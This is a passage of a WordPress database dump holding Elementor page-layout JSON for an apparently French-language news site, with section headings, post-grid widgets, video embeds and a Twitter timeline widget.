"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2388,766,'_elementor_version','0.4'),(2389,766,'_elementor_css','a:3:{s:4:\"time\";i:1509371582;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2391,767,'_elementor_edit_mode','builder'),(2392,767,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2393,767,'_elementor_version','0.4'),(2394,767,'_elementor_css','a:3:{s:4:\"time\";i:1509371653;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2395,768,'_elementor_edit_mode','builder'),(2396,768,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"t